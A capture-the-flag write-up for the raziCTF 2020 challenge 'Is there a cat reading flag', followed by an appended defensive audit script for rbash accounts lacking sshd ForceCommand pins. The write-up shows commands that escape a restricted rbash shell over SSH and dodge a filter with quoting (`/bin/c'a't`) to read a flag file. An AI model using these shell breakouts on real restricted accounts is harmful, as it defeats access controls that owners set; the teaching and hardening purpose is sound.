raziCTF 2020 : Is there a cat reading flag

Oct 26, 2020


Challenge Description


Solution

In this challenge we were given a server along with SSH login credentials.

After logging into the target host, we noticed that it's a restricted shell:

m3dsec@local:~$ ssh catFlag@37.152.181.193
catFlag@37.152.181.193's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)
...
Last login: Thu Oct 29 05:49:59 2020 from 123.139.80.95
catFlag@ariyan-server:~$ id
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
catFlag@ariyan-server:~$ ls
bin  flag.txt
catFlag@ariyan-server:~$ cat flag.txt
no cat flag.txt
catFlag@ariyan-server:~$ less falg.txt
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names

We can see the flag file but can't read it, so we had to bypass rbash first:

m3dsec@local:~$ ssh catFlag@37.152.181.193 -t "bash --noprofile"
catFlag@37.152.181.193's password: 
catFlag@ariyan-server:~$ /bin/less<flag.txt
RaziCTF{th3r3_!s_4_c4t_c4ll3d_fl4g}

or

catFlag@ariyan-server:~$ /bin/c'a't flag.txt
RaziCTF{th3r3_!s_4_c4t_c4ll3d_fl4g}
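
A hardening check for the bypass above, as an added example that is not part of the original writeup: `ssh user@host <command>` hands a client-chosen command to the account's login shell, and sshd's `ForceCommand` makes it ignore that command, so this script lists rbash accounts that no `Match User` block pins with `ForceCommand`. The sample passwd and sshd_config lines, the `kiosk` account and the `menu` command are constructed; it assumes plain `Match User a,b` blocks (no patterns, no Include files) and does not consider a global `ForceCommand`.

```sh
#!/bin/sh
# Added example: audit rbash accounts against sshd_config ForceCommand pins.

rbash_users() {              # $1 = passwd(5) file; prints rbash login names
  awk -F: '$7 ~ /(^|\/)rbash$/ { print $1 }' "$1"
}

forced_users() {             # $1 = sshd_config; prints users under a ForceCommand
  awk '
    /^[ \t]*#/ { next }                         # skip comment lines
    tolower($1) == "match" {                    # new Match block: reset scope
      users = ""
      for (i = 2; i < NF; i++)
        if (tolower($i) == "user") users = $(i + 1)
      next
    }
    tolower($1) == "forcecommand" && users != "" {
      n = split(users, u, ",")
      for (i = 1; i <= n; i++) print u[i]
    }
  ' "$1"
}

unpinned_rbash_users() {     # $1 = passwd file, $2 = sshd_config
  forced=$(forced_users "$2")
  for user in $(rbash_users "$1"); do
    # An rbash account with no ForceCommand still accepts a client command.
    printf '%s\n' "$forced" | grep -qxF -- "$user" || echo "$user"
  done
}

demo() {                     # constructed sample input, not from the real host
  dir=$(mktemp -d)
  printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'catFlag:x:1001:1001::/home/catFlag:/bin/rbash' \
    'kiosk:x:1002:1002::/home/kiosk:/usr/bin/rbash' > "$dir/passwd"
  printf '%s\n' \
    'PasswordAuthentication yes' \
    '# restricted accounts' \
    'Match User kiosk' \
    '    ForceCommand menu' > "$dir/sshd_config"   # "menu" is hypothetical
  unpinned_rbash_users "$dir/passwd" "$dir/sshd_config"
  rm -rf "$dir"
}

demo   # prints: catFlag
```

On a real host, point `unpinned_rbash_users` at `/etc/passwd` and the effective sshd configuration.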



